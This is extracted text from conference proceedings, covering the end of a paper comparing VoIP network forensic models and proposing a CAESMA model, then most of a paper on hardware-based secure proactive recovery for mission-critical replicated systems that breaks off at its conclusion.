The forensic network and Honeynet systems have the same data recollection function for system<br />
misuse. A Honeynet system lures attackers and gains information about new types of intrusions.<br />
Network forensic system analyzes and reconstructs the attack behavior. The integration of both<br />
systems will help to create an active self-learning and response system to capture the intrusion<br />
behavior and investigate the attack original source (Pelaez 2006).<br />
163
Figure 3: REN-JIN forensic model (Pelaez 2006)<br />
Jose Mas y Rubi et al.<br />
The Honeynets are highly controlled type of network architecture, one in which you can monitor all<br />
activity that occurs. By placing real victims (which can be any type of system, service or information)<br />
inside the network like an attack target, it creates an environment where you can observe everything<br />
that happens on it, allowing the attacking intruders interact with the Honeynet while information from<br />
that attack is being collected. This happens because Honeynets are high interaction real networks<br />
which implement traps to detect, deviate, or in some cases, to counteract non-authorize uses of the<br />
information system; where no service neither traffic is generated. Therefore, any interaction with the<br />
Honeynet implies malicious or non-authorize activities. Any connection initiated to a Honeynet implies<br />
that someone has compromised a system and has initiated a suspicious activity. This makes much<br />
easier the activity analysis, because all the captured information can be assumed as non-authorize or<br />
malicious one (Honeynet 2006).<br />
4. Comparative analysis<br />
One of the objectives of our work is to discuss the structure of REN-JIN and CALEA models, so that<br />
at the end, we could affirm if one of these models can be applicable for a VoIP traffic forensic<br />
analysis, and also proposing possible improvement to the selected model in this analysis process.<br />
The methodology to follow implies that the mentioned models are analyzed in the DFRWS general<br />
model structure, to identify if all the elements functions of each individual model meet the<br />
requirements of the chosen general model.<br />
In conclusion, the elements that integrate the forensic models CALEA and REN-JIN will be located in<br />
the corresponding step of the DFRWS model structure, to identify if the functions that those elements<br />
provide can cover one of the general model’s important steps.<br />
4.1 Discussion and analysis<br />
Table 2 shows the main function of each of the analyzed models, and then compared to the general<br />
model functions:<br />
4.2 REN-JIN and CALEA operation differences<br />
The main functions of CALEA are focused on a single component, LEA, which will depend on the<br />
traffic mirror used by the forensic agents to collect the required information. This makes the model<br />
easily adaptable to the rules governing the legal interception in the countries where these type of tools<br />
are used. However, it is the duty of each country to lay down rules for the use of this type of system,<br />
so the collected evidence could have full legality in the judicial environment.<br />
164
Jose Mas y Rubi et al.<br />
Table 2: Comparative analysis between REN-JIN and CALEA models<br />
In contrast, the main functions of REN-JIN are distributed between different components of the model,<br />
which are mainly controlled by the Network Forensic Server, which has autonomous power to<br />
determine what type of traffic should be captured and analyzed. This allow the tool to collect evidence<br />
in sequential steps, being able to obtain more precise and adequate information, regarding to the<br />
requirements of the judicial entities.<br />
Due to the characteristics of CALEA model, forensic investigators should have action freedom over<br />
the analyzed networks. However, because those networks can be public, there is a potential risk that<br />
interceptions could involve innocent users, violating their privacy rights.<br />
REN-JIN, as CALEA model, requires that forensic investigators have action freedom over the<br />
analyzed network. However, the traffic to be analyze is canalize to a Honeynet used by the model,<br />
preserving the privacy rights of all the user that are not involve in this study.<br />
It can be considered that CALEA performance is reactive, due to the fact that forensic investigators<br />
should identify the suspect and after it, they have to implement the analysis and capture platform<br />
proposed by the model.<br />
On the other hand, REN-JIN performance is also of the reactive type, but instead of previously identify<br />
the suspect, you need to identify the attacked network, which will become our decoy network<br />
(Honeynet), based in the analysis and capture platform proposed by the model.<br />
4.3 Model election<br />
Based on our analysis and after doing a balance between advantages and limitations of the two<br />
studied models, we observed that REN-JIN model has a more adequate architecture that possess the<br />
majority of the functions of the DFRWS general model, and when its limitations are overcome, this<br />
model can be validated as a network forensic model. Also, while REN-JIN is a theoretical model, we<br />
believe that it could be properly implemented.<br />
4.4 Improvements in the chosen model<br />
Considering REN-JIN as the chosen model, we observed that it presents several flaws, so we<br />
propose to correct them through the insertion of new elements that allow us to strengthen the<br />
architecture for a good VoIP forensic analysis.<br />
The identification function could be implemented in a convergence network through technologies like<br />
MEGACO H.248 protocol (ITU 2005) and ENUM (IETF 2004).<br />
165
Jose Mas y Rubi et al.<br />
The preservation function could be complemented with the deployment of a backup system like<br />
incremental backups and mirror system backups.<br />
The presentation function would be implemented with a report mechanism which contains the basic<br />
parameters that would allow to make an adequate legal analysis, and to use it as a proof and to<br />
possibly validate it as evidence. By modifying the REN-JIN model and introduce this new elements to<br />
it, a new forensic model is achieved, which we’ll call CAESMA model.<br />
5. Proposition of CAESMA model<br />
This proposition is an on-going investigation, so, in the following subsection we present a preliminary<br />
architecture and its basic operation.<br />
5.1 Presentation of the new architecture<br />
To be clear about the information flow between the elements that forms this network architecture, we<br />
present a basic diagram which is the following:<br />
Figure 4: Proposed network architecture<br />
By inserting an IP Multimedia Subsystem (IMS) module, this element will allow us to integrate various<br />
existing communication service platforms. Likewise, an ENUM module will allow us to link an<br />
identification number to a system user, having in mind that for each of the users may be various<br />
means of communication previously integrated to IMS. To make this user identification proposition<br />
viable is necessary that, for each of the services offered by the Service Provider, exists an appropriate<br />
registration in ENUM. For example:<br />
Figure 5: ENUM operation<br />
166
Jose Mas y Rubi et al.<br />
Another pending point in the improvement is the preservation function, and this can be improved<br />
through data duplication techniques like RAID disc structures, or by redundant servers; this<br />
modification must be implemented specifically in the Network Forensics Server, which can send the<br />
backup data to a medium describe above, after the data is previously analyzed.<br />
For the presentation function, the purpose of this element is to generate reports which will be<br />
presented to the competent authorities, for this is necessary to count with specialized personal that<br />
can adequately identify the proofs and validate them as possible evidences. For this purpose, we<br />
consider that an element that can fulfill this function is the Legal Enforcement Agency (LEA), which is<br />
a fundamental part of the CALEA model. Some of the basic parameters to be considered would be<br />
the ones presented in section II under the VoIP topic.<br />
5.2 Proposed network basic operation<br />
The operation of the network architecture and the relevant states for our analysis are appointed in the<br />
following lines:<br />
1) A call is generated from the Internet; it wants to communicate with some user on the network,<br />
for which it uses a number, for example, 4981791.<br />
2) Once the Gateway received the internet user communication petition, it will interact with the<br />
IMS core, which will interact at the same time with ENUM, and will return the user identification of<br />
the called number, according to SIP signaling.<br />
3) The CAESMA network will intercept the IMS core response and identify the affected user for<br />
the criminal acts which is being communicated.<br />
4) CAESMA will connect the capture network and starts the real time forensic process.<br />
5) The called user acts and proceeds with the communication normally.<br />
6) When the communication is finalized, the forensic process of recollecting proofs is also<br />
finished.<br />
Figure 6: Relevant states in CAESMA network operation<br />
6. Conclusions<br />
The current trend of widespread use of VoIP communications make indispensable to the forensic<br />
investigators to count with the necessary tools to study and prevent all the possible vulnerability<br />
threats in the communications.<br />
Possible applicable tools to this problematic issue, according to the investigation made in this paper,<br />
are the REN-JIN model and the CALEA model. Both were thought as network forensic models and<br />
are not fully adequate for evidence recollection in VoIP communications, due to the special<br />
parameters of the evidence, that allow the network forensic investigators to identify and capture<br />
specific data from the crime.<br />
167
Jose Mas y Rubi et al.<br />
In this sense, the new CAESMA model is proposed, which appears to cover the shortcomings noted<br />
in the forensic models previously mentioned, meeting all necessary steps for a proper VoIP forensic<br />
analysis, as established in the DFRWS general model.<br />
In conclusion, the CAESMA model offers a robust network forensic system for identification,<br />
preservation, collection, examination, analysis and presentation of the information concerning the<br />
VoIP traffic, which ultimately will provide us with validate evidence for an adequate use by judicial<br />
authorities.<br />
7. Future works<br />
Based in the comparative analysis completed in this work and the preliminary presentation of the<br />
CAESMA model, the next step in our work is to develop this new forensic model and its respective<br />
validation for an adequate VoIP network analysis.<br />
8. Annex 1<br />
Tree of trouble<br />
168
Tree of Objectives<br />
Acknowledgements<br />
Jose Mas y Rubi et al.<br />
To Juan C. Pelaez from U.S. Army Research Laboratory, USA, for his collaboration and for supply us<br />
with updated work material.<br />
To Juergen Rochol and Liane M. Rockenbach Tarouco from UFRGS, RS-Brazil, for their state of the<br />
art documentation.<br />
References<br />
DFRWS: Digital Forensics Research Workshop. (2001) "A Road Map for Digital Forensics Research 2001”.<br />
Digital Forensics Research Workshop 6 November. http://www.dfrws.org/2001/dfrws-rm-final.pdf<br />
IETF: Internet Engineering Task Force. (2004) “RFC 3761: The E.164 to URI DDDS Application (ENUM)”,<br />
http://www.ietf.org/rfc/rfc3761.txt<br />
ITU: International Telecommunication Union, (2005) “Recommendation H.248.1”, http://www.itu.int/rec/T-REC-<br />
H.248.1-200509-I/en<br />
Fernandez, Eduardo; Pelaez, Juan and Larrondo-Petrie, Maria. (2007) “Security patterns for Voice over IP<br />
Networks”, Journal of Software, Vol. 2, No. 2, August.<br />
169
Jose Mas y Rubi et al.<br />
Moore, T.; Meehan, A.; Manes, G. and Shenoi, S. (2005) “Using Signaling Information in Telecom Network<br />
forensics”. Advances in Digital Forensics: IFIP International <strong>Conference</strong> on Digital Forensics, National<br />
Center for Forensic Science, Orlando, Florida, USA.<br />
Pelaez, Juan and Fernandez, Eduardo. (2006) “Wireless VOIP Network Forensics”, Fourth LACCEI International<br />
Latin American and Caribbean <strong>Conference</strong> for Engineering and Technology (LACCET’2006), Mayaguez,<br />
Puerto Rico.<br />
Pelaez, Juan; Fernandez, Eduardo; Larrondo-Petrie, Maria and Wieser, Christian. (2007) “Attack Patterns in<br />
VoIP”, Florida Atlantic University, USA. University of Oulu, USA.<br />
Pelaez, Juan and Fernandez, Eduardo. (2010) “VoIP Network Forensic Patterns”, U.S. Army Research<br />
Laboratory, USA. Florida Atlantic University, USA.<br />
Ray, Daniel and Bradford, Phillip. (2007) “Models of Models: Digital Forensics and Domain-Specific Languages”,<br />
Department of Computer Science, The University of Alabama, USA.<br />
Reith, Mark; Carr, Clint and Gunsch, Gregg. (2002) “An Examination of Digital Forensic Models”, International<br />
Journal of Digital Evidence, Fall, Volume 1, Issue 3.<br />
Scoggins, Sophia. (2004) “Security Challenges for CALEA in Voice over Packet Networks”. Texas Instruments,<br />
April 16, USA.<br />
The Honeynet Project. (2006) “Know Your Enemy: Honeynets”, http://www.honeynet.org<br />
170
Secure Proactive Recovery – a Hardware Based Mission<br />
Assurance Scheme<br />
Ruchika Mehresh 1 , Shambhu Upadhyaya 1 and Kevin Kwiat 2<br />
1<br />
State University of New York at Buffalo, USA<br />
2<br />
Air Force Research Laboratory, Rome, USA<br />
rmehresh@buffalo.edu<br />
shambhu@buffalo.edu<br />
kwiatk@rl.af.mil<br />
Abstract: Mission Assurance in critical systems entails both fault tolerance and security. Since fault tolerance via<br />
redundancy or replication is contradictory to the notion of a limited trusted computing base, normal security<br />
techniques cannot be applied to fault tolerant systems. Thus, in order to enhance the dependability of mission<br />
critical systems, designers employ a multi-phase approach that includes fault/threat avoidance/prevention,<br />
detection and recovery. Detection phase is the fallback plan for avoidance/prevention phase, as recovery phase<br />
is the fallback plan for detection phase. However, despite this three-stage barrier, a determined adversary can<br />
still defeat system security by staging an attack on the recovery phase. Recovery being the final stage of the<br />
dependability life-cycle, unless certain security methodologies are used, full assurance to mission critical<br />
operations cannot be guaranteed. For this reason, we propose a new methodology, viz. secure proactive<br />
recovery that can be built into future mission-critical systems in order to secure the recovery phase at low cost.<br />
The solution proposed is realized through a hardware-supported design of a consensus protocol. One of the<br />
major strengths of this scheme is that it not only detects abnormal behavior due to system faults or attacks, but<br />
also secures the system in case where a smart attacker attempts to camouflage by playing along with the<br />
predefined protocols. This sort of adversary may compromise certain system nodes at some earlier stage but<br />
remain dormant until the critical phase of the mission is reached. We call such an adversary The Quiet Invader.<br />
In an effort to minimize overhead, enhance performance and tamper-proof our scheme, we employ redundant<br />
hardware typically found in today’s self-testing processor ICs, like design for testability (DFT) and built-in self-test<br />
(BIST) logic. The cost and performance analysis presented in this paper validates the feasibility and efficiency of<br />
our solution.<br />
Keywords: security, fault tolerance, mission assurance, critical systems, hardware<br />
1. Introduction<br />
Research in the past several decades has seen significant maturity in the field of fault tolerance. But,<br />
fault tolerant systems still require multi-phased security due to the lack of a strong trusted computing<br />
base. The first phase in this regard is avoidance/prevention, which consists of proactive measures to<br />
reduce the probability of any faults or attacks. This can be achieved via advanced design<br />
methodologies like encryption. The second phase, detection, primarily consisting of an intrusion<br />
detection system attempts to detect the faults and malicious attacks that occur despite the preventive<br />
measures. The final phase is the recovery that focuses on recuperating the system after the<br />
occurrence of attack/fault. Generally, fault tolerant systems rely on replication and redundancy for<br />
fault-masking and system recovery.<br />
These three layers of security provide a strong defense for mission critical systems. Yet, if a<br />
determined adversary stages an attack on the recovery phase of an application, it is quite possible<br />
that the mission will fail due to the lack of any further countermeasures. Therefore, these systems<br />
need the provisioning of another layer of defense to address attacks that may be brought about by<br />
malicious opponents during the recovery phase itself.<br />
The quiet invader is another serious threat that we consider. Attacking the mission in its critical phase<br />
not only leaves the defender with less time to respond, but cancelling the mission at this late stage is<br />
far more expensive than cancelling it at some earlier stage. In the case where the defender is not left<br />
with enough time to respond to the attack, it can lead to major economic loss and even fatalities.<br />
We develop a framework for mission assured recovery using the concept of runtime node-to-node<br />
verification implementable at low-level hardware that is not accessible by the adversary. The rationale<br />
behind this approach is that if an adversary can compromise a node by gaining root privilege to userspace<br />
components, any solution developed in the user space will not be effective since such solutions<br />
may not remain secure and tamper-resistant. In our scheme, the entire verification process can be<br />
carried out in a manner that is oblivious to the adversary, which gains the system an additional<br />
171
Ruchika Mehresh et al.<br />
advantage. We explore the potential of utilizing the test logic on the processors (and hence the name<br />
“hardware-based mission assurance scheme”) for implementing our secure proactive recovery<br />
paradigm. This choice makes our solution extremely cost effective. In order to establish the proof-ofconcept<br />
for this proposal, we will consider a simple mission critical system architecture that uses<br />
majority consensus for diagnosis and recovery. Finally, we analyze the security, usability and<br />
performance overhead for this scheme.<br />
2. Related work<br />
The solutions proposed in the literature to address faults/attacks in fault tolerant systems are<br />
designed to employ redundancy, replication and consensus protocols. They are able to tolerate the<br />
failure of up to f replicas. However, given enough time and resources, an attacker can compromise<br />
more than f replicas and subvert the system. A combination of reactive and proactive recovery<br />
approaches can be used to keep the number of compromised replicas under f at all times (Sousa et<br />
al. 2007). However, as the attacks become more complex, it becomes harder to detect any faulty or<br />
malicious behavior (Wagner and Soto 2002). Moreover, if one replica is compromised, the adversary<br />
holds the key to other replicas too. To counter this problem, researchers have proposed spatial<br />
diversity in software. Spatial diversity can slow down an adversary but eventually the compromise of<br />
all diverse replicas is possible. Therefore, it was further proposed to introduce time diversity along<br />
with the spatial diversity. Time diversity modifies the state of the recovered system (OS access<br />
passwords, open ports, authentication methods, etc.). This is to assure that an attacker is unable to<br />
exploit the same vulnerabilities that he had exploited before (Bessani et al. 2008).<br />
3. Threat model<br />
We developed an extensive threat model to analyze security logically in a wide range of scenarios.<br />
Assume that we have n replicas in a mission-critical application and the system can tolerate the failure<br />
of up to f replicas during the entire mission.<br />
Scenario 1: Attacks on Byzantine fault-tolerant protocols<br />
Assume that no design diversity is introduced in a replicated system. During the mission lifetime, an<br />
adversary can easily compromise f+1 identical replicas and bring down the system.<br />
Scenario 2: Attacks on proactive recovery protocols<br />
In proactive recovery, the whole system is rejuvenated periodically. However, the adversary becomes<br />
more and more knowledgeable as his attacks evolve with each succeeded/failed attempt. So it is only<br />
a matter of time before he is able to compromise f+1 replicas between periodic rejuvenations.<br />
Furthermore, the compromised replicas can disrupt the system’s normal functioning in many ways like<br />
creating extra traffic so the recovery is delayed and the adversary gains more time to compromise f+1<br />
replicas (Sousa et al. 2007).This is a classic case of attacking the recovery phase.<br />
Scenario 3: Attacks on proactive-reactive recovery protocols<br />
Proactive-reactive recovery solves several major problems, except that if the compromised node is<br />
recovered by restoring the same state that was previously attacked, the attacker will already know the<br />
vulnerabilities (Sousa et al. 2007). In this case, a persistent attacker may get faster with time, or may<br />
invoke many reactive recoveries exhausting the system resources. Large number of recoveries also<br />
affects the system availability adversely. This is also an instance of attacking the recovery phase.<br />
Furthermore, arbitrary faults are very difficult to detect (Haeberlen et al. 2006).<br />
Scenario 4: Attacks on proactive-reactive recovery with spatial diversity<br />
Spatial diversity in replicas is proposed to be a relatively stronger security solution. It can be difficult<br />
and more time-consuming for the adversary to compromise f+1 diverse replicas but it is possible to<br />
compromise these diverse replicas eventually, especially for long running applications. Also, most of<br />
the existing systems are not spatially diverse. Introducing spatial diversity into the existing systems is<br />
expensive.<br />
Time diversity has been suggested to complement the spatial diversity so as to make it almost<br />
impossible to predict the new state of the system (Bessani et al. 2008). The complexity involved in<br />
172
Ruchika Mehresh et al.<br />
implementing time diversity in a workable solution is very high because it will have to deal with on-thefly<br />
compatibility issues and much more. Besides, updating replicas and other communication<br />
protocols consume considerable time and resources. A decent workable solution employing space<br />
diversity still needs a lot of work (Banatre et al. 2007), so employing time diversity is a step planned<br />
too far into the future.<br />
Scenario 5: The quiet invader<br />
In the presence/absence of spatial diversity, an adversary may be able to investigate a few selected<br />
nodes quietly and play along with the protocol to avoid getting caught and gain more time to<br />
understand the system. After gathering enough information, the adversary can design attacks for f+1<br />
replicas and launch the attacks on all of them at once when he is ready or when the mission enters a<br />
critical stage. If these attacks are not detected or dealt with in time, the system fails. This is an<br />
evasive attack strategy for subverting the detection and recovery phases. Similar threat models have<br />
been discussed in literature previously (Todd et al. 2007, Del Carlo 2003).<br />
Scenario 6: The physical access threat<br />
Sometimes system nodes are deployed in an environment where physical access to them is a highly<br />
probable threat. For instance, in the case of wireless sensor network deployment, sensor nodes are<br />
highly susceptible to physical capture. To prevent such attacks, we need to capture any changes in<br />
the physical environment of a node. A reasonable solution may involve attaching motion sensors to<br />
each node. Any unexpected readings from these motion sensors will indicate a possible threat and<br />
then our scheme can be used to assure the mission.<br />
4. System design<br />
4.1 Assumptions<br />
We work with a simplified, centralized architecture of a mission critical application in order to describe<br />
and evaluate the proposed scheme. No spatial or time diversity is assumed, though our scheme will<br />
work with any kind of diversity.<br />
The network can lose, duplicate or reorder messages but is immune to partitioning. The coordinator<br />
(central authority and trusted computing base) is responsible for periodic checkpointing in order to<br />
maintain a consistent global state. The stable storage at coordinator holds the recovery data through<br />
all the tolerated failures and their corresponding recoveries. We assume sequential and equidistant<br />
checkpointing (Elnozahy et al. 2002).<br />
The replicas are assumed to be running on identical hardware platforms. Each node has advanced<br />
CPU (Central processing unit) and memory subsystems along with the test logic (in the form of DFT<br />
and BIST) that is generally used for manufacture test. Refer to Fig. 1(a). All the chips comply with the<br />
IEEE 1149.1 JTAG standard (Abramovici and Stroud 2001). Fig. 1(b) elaborates the test logic and<br />
boundary scan cells corresponding to the assumed hardware.<br />
We assume a software tripwire running on each replica that can be used to detect a variety of<br />
anomalies at the host. By instrumenting the openly available tripwire source code (Hrivnak 2002), we<br />
can direct the "intrusion alert/alarm" to a set of system registers (using low level coding).The triggered<br />
and latched hardware signature will be read out by taking a snapshot of the system registers using<br />
the “scan-out” mode of the observation logic associated with the DFT hardware. The bit pattern will be<br />
brought out to the CPU ports using the IEEE 1149.1 JTAG instruction set in a tamper-resistant<br />
manner. Once it is brought out of the chip, it will be securely sent to the coordinator for verification and<br />
further action. This way, the system will be able to surreptitiously diagnose the adversary’s action.<br />
4.2 Conceptual basics<br />
We present a simple and practical alternative to the spatial/time diversity solutions in order to increase<br />
the resilience of a fault tolerant system against benign faults and malicious attacks. In particular, this<br />
is to address the threat of a quiet invader (Scenario 5 of Section 3). An adversary needs to<br />
compromise f+1 replicas out of the n correctly working replicas in order to affect the result of a<br />
majority consensus protocol and disrupt the mission.<br />
173
Figure 1(a): Replicated hardware<br />
Figure 1(b): Capturing signature<br />
Ruchika Mehresh et al.<br />
The key idea is to detect a system compromise by a smart adversary who has taken over some<br />
replicas (or has gained sufficient information about them) but is playing along in order to gain more<br />
time. From the defender’s point of view, if the system knows which of the n replicas have become<br />
untrustworthy, the mission can still succeed with the help of the surviving healthy replicas. Smart<br />
attackers try to minimize the risk of getting caught by compromising only the minimum number of<br />
replicas required in order to subvert the entire system. Aggressive attackers can be clearly and easily<br />
detected and thus their attacks can be recovered from. So a smart defender should be able to detect<br />
the attacks surreptitiously so as not to make the attacker aggressive. This especially holds for the<br />
cases when a smart attacker has been hiding for long and the mission is nearing completion. At this<br />
stage, the priority is not to identify the attacker but to complete the mission securely.<br />
The proposed scheme offers a passive detection and recovery, in order to assure the adversary of its<br />
apparent success to prevent him from getting more aggressive. At some later stage, when the<br />
adversary launches an attack to fail f+1 replicas at once, the attack fails because those replicas have<br />
already been identified and ousted from the voting process without the knowledge of the attacker. In<br />
our solution, we require that there should be at least two correctly working replicas to provide a duplex<br />
system at a minimum, for the mission to succeed. The advantage of this approach is that in the worst<br />
case where all the replicas are compromised, the system will not deliver a result, rather than<br />
delivering a wrong one. This is a necessary condition for many safety-critical missions. If an adversary<br />
can compromise a replica by gaining root privilege to user-space components, one should note that<br />
any solution developed in the user space will not be effective since such solutions will not remain<br />
secure and tamper-resistant. Therefore, our paradigm achieves detection of node compromise<br />
through a verification scheme implementable in low-level hardware. We use software or hardwaredriven<br />
tripwires that would help detect any ongoing suspicious activity and trigger a hardware<br />
signature that indicates the integrity status of a replica. This signature is generated without affecting<br />
the application layer, and hence the attacker remains oblivious of this activity. Also, a smart attacker is<br />
not likely to monitor the system thoroughly as that may lead to detection. This signature is then<br />
securely collected and sent to the coordinator that performs the necessary action.<br />
4.3 Checkpointing<br />
In our simplified application, the checkpointing module that affiliates to the coordinator establishes a<br />
consistent global checkpoint and also carries out voting procedures that lead to anomaly detection<br />
due to faults, attacks or both.<br />
174
Ruchika Mehresh et al.<br />
The coordinator starts the checkpointing/voting process by broadcasting a request message to all the<br />
replicas, asking them to take checkpoints. It also initiates a local timer that runs out if the coordinator<br />
does not receive the expected number of replies within a specific time frame. On receiving this<br />
message, all the replicas pause their respective executions and take a checkpoint. These checkpoints<br />
are then sent over the network to the coordinator through a secure channel using encryption. On<br />
receiving the expected number of checkpoints, coordinator compares them for consistency. If all<br />
checkpoints are consistent, it broadcasts a commit message that completes the two-phase checkpoint<br />
protocol. After receiving the commit message, all the replicas resume their respective executions. This<br />
is how the replicas execute in lockstep. In case the timer runs out before the expected number of<br />
checkpoints are received at the coordinator, it sends out another request message. All the replicas<br />
send their last locally stored checkpoints as a reply to this request message. In our application, we<br />
have limited the number of repeated checkpoint requests to three per non-replying replica. If a replica<br />
does not reply to three (or a threshold count) checkpoint request messages, it is considered dead by<br />
the coordinator and a commit message is sent to the rest of the replicas if their checkpoints are<br />
consistent. In case that the checkpoints are not consistent, the coordinator replies with a rollback<br />
message to all the replicas. This rollback message includes the last consistent checkpoint that was<br />
stored on the stable storage at the coordinator. All the replicas then return to the previous state of<br />
execution as defined by the rollback message. If a certain replica fails to deliver consistent checkpoint<br />
and causes more than three (or a threshold count) consecutive rollbacks, the fault is considered<br />
permanent and the replica is excluded from the system.<br />
A hardware signature is generated at each replica and piggybacked on the checkpoint when it is sent<br />
to the coordinator. This signature quantifies the integrity status of the replica since the last successful<br />
checkpoint. For simplicity, we use the values – all-0s (for an uncompromised replica) and all-1s (for a<br />
compromised replica). A host-based intrusion detection sensor at all the replicas is responsible for<br />
generating these signatures. If the coordinator finds any hardware signature to be all-1s, then the<br />
corresponding replica is blacklisted and any of its future results/checkpoints are ignored at the<br />
coordinator. However, the coordinator continues normal communication with the blacklisted replica to<br />
keep the attacker unaware of this discovery.<br />
Finally, all the results from each of the non-blacklisted replicas will be voted upon by the coordinator<br />
for the final result.<br />
4.4 Using built-in test logic for hardware signature generation and propagation<br />
As described under assumptions, the system uses a software-driven trip-wire that monitors the<br />
system continuously for a specified range of anomalies. Tripwire raises an alarm on anomaly<br />
detection by setting the value of a designated system register to all-1s (it will be all-0s otherwise). This<br />
value then becomes the integrity status indicator for the replica and is read out using the scan-out<br />
mode of the test logic. It is then securely sent to the coordinator for verification.<br />
5. Performance analysis<br />
Most of the mission critical military applications that employ checkpointing or proactive security tend to<br />
be long running ones. For instance, a rocket launch countdown running for hours/days. Therefore, our<br />
performance analysis will focus on long running applications and their overall execution time.<br />
Since our scheme employs built-in hardware for implementing security, and security-related<br />
notifications piggyback the checkpointing messages, our security comes nearly free for systems that<br />
already use checkpointing for fault tolerance. However, many legacy systems that do not use any<br />
checkpointing will need to employ checkpointing before they can benefit from our scheme. In such<br />
cases, cost of checkpointing is also included in the cost of employing our security scheme. To cover<br />
all these possibilities, we consider the following three cases.<br />
Case 1: This case includes all the mission critical legacy systems that do not employ checkpointing or<br />
security.<br />
Case 2: This case examines mission critical systems that employ checkpointing as a safety measure<br />
in the absence of any failures or attacks. Note that this will be the worst case scenario for Case 1<br />
systems that may adopt our scheme because there are practically no faults/attacks. Also, our security<br />
scheme is nearly free for Case 2 systems, if they choose to employ it.<br />
175
Ruchika Mehresh et al.<br />
Case 3: The systems considered under Case 3 employ checkpointing and our proposed security<br />
scheme (hardware signature verification). This case considers the occurrence of failures and securityrelated<br />
attacks.<br />
These three cases allow us to study the cost of adopting our security scheme in all possible<br />
scenarios.<br />
Since the proposed system is composed of both hardware and software subsystems, we could not<br />
use one standard simulation engine to simulate the entire application accurately and obtain data.<br />
Therefore, we combined the results obtained from individually simulating the software and the<br />
hardware components using our multi-step simulation approach (Mehresh et al. 2010).<br />
5.1 Simplified system prototype development<br />
Figure 2 shows the modular design of the simplified system for mission critical applications with n<br />
replicas. The coordinator is the core of this centralized replicated system. It is responsible for voting<br />
operations on intermediate results, integrity signatures and checkpoints obtained from the replicas.<br />
The heartbeat manager broadcasts periodic ping messages to determine if the nodes are alive. The<br />
replicas are identical copies of the workload executing in parallel in lockstep.<br />
Figure 2: Overall system design<br />
5.2 Multi-step simulation approach<br />
We use a multi-step simulation approach to evaluate the system performance for the three cases.<br />
This new approach is required because there are currently no benchmarks for evaluating such<br />
systems. A combination of pilot system implementation and simulation is used to obtain more realistic<br />
and statistically accurate results.<br />
Different components of this evaluation include a JAVA implementation based on Chameleon<br />
ARMORs (Kalbarczyk et al. 1999), ARENA simulation (http://www.arenasimulation.com/) and<br />
CADENCE simulation (http://www.cadence.com). ARENA simulation is discrete event and it simulates<br />
the given system at a high level of abstraction. The lower levels of abstraction that become too<br />
complex to model are parameterized using the data obtained from conducting experiments with the<br />
JAVA system prototype. Another reason for using ARENA simulator is the analysis of long running<br />
mission critical applications. Such an analysis with real-time experiments is not efficient and extremely<br />
time consuming. The Java prototype consists of socket programming across a network of 100 Mbps<br />
bandwidth. The experiments for measuring performance were conducted on Windows platform with<br />
an Intel Core Duo 2 GHz processor and 2 GB RAM. CADENCE simulation is primarily used for the<br />
feasibility study of the proposed hardware scheme. To verify the precision of our simulators, test<br />
cases were developed and deployed for the known cases of operation.<br />
This system accepts workloads from the user and executes them in a fault tolerant environment. We<br />
used the Java SciMark 2.0 workloads as user inputs in this system prototype. The four workloads that<br />
we used are: Fast Fourier Transform (FFT), Jacobi Successive Over-relaxation (SOR), Sparse Matrix<br />
176
Ruchika Mehresh et al.<br />
multiplication (Sparse) and Dense LU matrix Factorization (LU). The standard large data sets<br />
(http://math.nist.gov/scimark2) were used.<br />
Data-sets from short running replicated experiments were collected and fitted probability distributions<br />
were obtained using ARENA input data analyzer. These distributions defined the stochastic<br />
parameters for ARENA simulation model.<br />
We examine the feasibility of the hardware component of this architecture (as described under<br />
assumptions) as follows. The integrity signature of a replica is stored in the flip flops of the boundary<br />
scan chain around a processor. This part of our simulation is centered on a boundary scan inserted<br />
DLX processor (Patterson and Hennessy 1994). Verilog code for the boundary scan inserted DLX<br />
processor is elaborated in cadence RTL compiler. To load the signature into these scan cells<br />
a multiplexer is inserted before each cell, which has one of the inputs as test data input (TDI) and the<br />
other from the 32 bit signature vector. Depending on the select line either the test data or the<br />
signature is latched into the flip flops of the scan cells. To read the signature out the bits are serially<br />
shifted from the flip flops onto the output bus.<br />
5.3 Results<br />
We analyze the prototype system for the three cases described earlier. Since we want to evaluate the<br />
performance of this system in the worst case scenario where the checkpointing overhead is<br />
maximum, we choose sequential checkpointing (Elnozahy et al. 2002). For the following analysis<br />
(unless mentioned), checkpoint interval is assumed to be 1 hour. Table 1 presents the execution<br />
times for the four Scimark workloads. The values from Table 1 are plotted in Figure 3 on a logarithmic<br />
scale. We can see that the execution time overhead increases a little when the system shifts from<br />
Case 1 to Case 2 (i.e., employing our scheme as a preventive measure). However, the execution time<br />
overhead increases rapidly when the system moves from Case 2 and Case 3. The execution<br />
overhead will only increase substantially if there are too many faults present, in which case it would be<br />
worth the fault tolerance and security that comes along. As we can see from the values of Table 1, an<br />
application that runs for 13.6562 hours will incur an execution time overhead of only 13.49 minutes in<br />
moving from Case 1 to Case 2.<br />
Figure 3: Execution times for Scimark workloads across three cases, on a logarithmic scale<br />
Figure 4 shows the percentage increase in execution times of various workloads when the system<br />
upgrades from a lower case to a higher one. It is assumed that these workload executions do not<br />
have any interactions (inputs/outputs) with the external environment. The percentage increase in<br />
execution times of all the workloads when the system upgrades from Case 1 to Case 2 is only around<br />
1.6%. An upgrade from Case 1 to Case 3 (with mean time to fault, M =10) is around 9%. These<br />
percentages indicate acceptable overheads.<br />
177
Ruchika Mehresh et al.<br />
Table 1: Execution times (in hours) for the Scimark workloads across three cases<br />
Case 1<br />
Case 2<br />
Case 3 (M=10)<br />
Case 3 (M=25)<br />
FFT LU SOR Sparse<br />
3421.09 222.69 13.6562 23.9479<br />
3477.46 226.36 13.8811 24.3426<br />
3824.63 249.08 15.2026 26.7313<br />
3593.39 233.83 13.8811 24.3426<br />
Figure 4: Percentage execution time overheads incurred by the Scimark workloads while shifting<br />
between cases<br />
As Table 1 shows, for a checkpoint interval of 1 hour and M =10, the workload LU executes for<br />
approximately 10 days. Figure 5 shows the effect of increasing checkpoint interval for workload LU for<br />
different values of M ranging from 5 to 25. The optimal checkpoint interval values (and the<br />
corresponding execution times) for the graph plots in Figure 5 are provided in Table 2.<br />
Figure 5: Effect of checkpoint interval on workload execution times at different values of M<br />
Note that we used the multi-step approach for this simulation and the parameters for the simulation<br />
model were derived from experimentation. Therefore, these results do not just represent the data<br />
trends but are also close to the statistically expected real-world values.<br />
178
Ruchika Mehresh et al.<br />
Table 2: Approximate optimal checkpoint interval values and their corresponding workload execution<br />
times for LU (Case 3) at different values of M<br />
6. Conclusion<br />
Optimal Checkpoint Interval (hours)<br />
Execution Times(hours)<br />
